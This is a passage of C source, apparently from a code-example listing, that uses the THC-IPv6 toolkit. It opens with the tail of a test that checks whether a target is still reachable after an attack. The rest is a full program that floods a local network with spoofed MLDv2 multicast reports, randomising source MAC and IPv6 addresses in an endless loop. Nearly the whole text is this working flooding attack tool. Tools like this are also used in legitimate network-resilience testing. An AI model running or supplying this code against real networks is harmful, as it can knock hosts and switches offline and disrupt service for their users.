  else
    printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count);

  thc_pcap_close(p);

  return 0;
}
예제 #28
0
int main(int argc, char *argv[]) {
  char *interface, mac[6] = "";
  unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0");
  unsigned char buf[6], buf2[RECORD_NUMBER * (4 + 16 + 16)];
  unsigned char *dst = thc_resolve6("ff02::16"), *dstmac = thc_get_multicast_mac(dst);
  int i, j, prefer = PREFER_LINK;
  unsigned char *pkt = NULL;
  int pkt_len = 0;
  int rawmode = 0;
  int count = 0;

  if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);

  interface = argv[1];
  if (thc_get_own_mac(interface) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  if (argc > 2) {
    if ((dst = thc_resolve6(argv[2])) == NULL) {
      fprintf(stderr, "Error: can not resolve %s\n", argv[2]);
      exit(-1);
    }
    if (dst[0] >= 0x20 && dst[0] <= 0xfd) {
      prefer = PREFER_GLOBAL;
      ip6 = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL);
    }
  }

  mac[0] = 0x00;
  mac[1] = 0x18;
  ip6[9] = mac[1];
  memset(buf, 0, sizeof(buf));
  buf[0] = 5;
  buf[1] = 2;
  memset(buf2, 0, sizeof(buf2));
  for (i = 0; i < RECORD_NUMBER; i++) {
    buf2[0 + i * 36] = 3;       // CHANGE_TO_INCLUDE_MODE
    buf2[3 + i * 36] = 1;
    buf2[4 + i * 36] = 0xff;
    buf2[5 + i * 36] = 0x02;
    memcpy(buf2 + 20 + i * 36, ip6, 16);
  }

  printf("Starting to flood network with MLDv2 reports on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
  while (1) {

    for (i = 0; i < 4; i++)
      mac[2 + i] = rand() % 256;

//    ip6[9] = mac[1];
    ip6[10] = mac[2];
    ip6[13] = mac[3];
    ip6[14] = mac[4];
    ip6[15] = mac[5];

    for (i = 0; i < RECORD_NUMBER; i++) {
      for (j = 0; j < 6; j++)
        buf2[14 + j + i * 36] = rand() % 256;
      memcpy(buf2 + 29 + i * 36, ip6 + 9, 7);
    }
    count++;

    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
      return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD2_REPORT, 0, RECORD_NUMBER, buf2, sizeof(buf2), 0) < 0)
      return -1;
    if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
//      fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
//      perror("");
//      return -1;
      printf("!");
    }

    pkt = thc_destroy_packet(pkt);
//    usleep(1);
    if (count % 1000 == 0)
      printf(".");
  }
  return 0;
}